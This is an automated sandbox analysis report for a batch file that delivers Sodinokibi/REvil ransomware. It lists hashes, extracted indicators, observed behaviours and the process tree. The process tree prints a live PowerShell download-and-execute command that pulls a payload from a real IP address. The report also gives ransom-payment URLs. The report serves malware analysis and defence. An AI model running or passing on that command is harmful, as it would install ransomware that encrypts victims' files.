Analysis
-
max time kernel
105s -
max time network
118s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
24-03-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
9sqN4BDv.bat
Resource
win7v200217
Behavioral task
behavioral2
Sample
9sqN4BDv.bat
Resource
win10v200217
General
-
Target
9sqN4BDv.bat
-
Size
192B
-
MD5
cc0b34e285a2bb5b9ab6cd4d0592c578
-
SHA1
6aecda27a86b4d3b07cb48a9df62aa6939372b6b
-
SHA256
a13613d7952a7e6474f41c2fcf650bec3e50ee027145a402bba895ab8297b4f1
-
SHA512
e30461021be4fe4bb764cb8763e8c2da51c14d0dad429ac8daae5a7a14591949d3ee2be520eb32cdf423ff7e4bbb85d4927b2ac597591c6d1ace11d28c534447
Malware Config
Extracted
http://185.103.242.78/pastes/9sqN4BDv
Extracted
C:\9vdg210-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6EEA68D9D46B398A
http://decryptor.cc/6EEA68D9D46B398A
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1868 powershell.exe 1868 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1868 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Discovering connected drives 3 TTPs 6 IoCs
Processes:
powershell.execmd.exedescription ioc process File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe -
Drops file in Program Files directory 19 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\SuspendGrant.m4a powershell.exe File opened for modification \??\c:\program files\ConvertToFormat.ini powershell.exe File opened for modification \??\c:\program files\DisableCopy.M2T powershell.exe File opened for modification \??\c:\program files\LockBackup.au powershell.exe File opened for modification \??\c:\program files\MoveWait.tif powershell.exe File opened for modification \??\c:\program files\RestartSave.xltm powershell.exe File opened for modification \??\c:\program files\RestartUninstall.midi powershell.exe File opened for modification \??\c:\program files\SkipApprove.xhtml powershell.exe File opened for modification \??\c:\program files\UnpublishConvertTo.rmi powershell.exe File created \??\c:\program files (x86)\9vdg210-readme.txt powershell.exe File opened for modification \??\c:\program files\ExpandProtect.ods powershell.exe File opened for modification \??\c:\program files\UnpublishSync.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9vdg210-readme.txt powershell.exe File opened for modification \??\c:\program files\EditRepair.mpv2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\9vdg210-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\9vdg210-readme.txt powershell.exe File opened for modification \??\c:\program files\SplitRestart.bmp powershell.exe File created \??\c:\program files\9vdg210-readme.txt powershell.exe File opened for modification \??\c:\program files\GrantOpen.inf powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\itl.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1868 powershell.exe Token: SeTakeOwnershipPrivilege 1868 powershell.exe -
Suspicious use of WriteProcessMemory 1 IoCs
Processes:
cmd.exedescription pid process target process PID 1844 wrote to memory of 1868 1844 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\9sqN4BDv.bat"1⤵
- Discovering connected drives
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9sqN4BDv');Invoke-ZAXLINUUB;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Discovering connected drives
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1868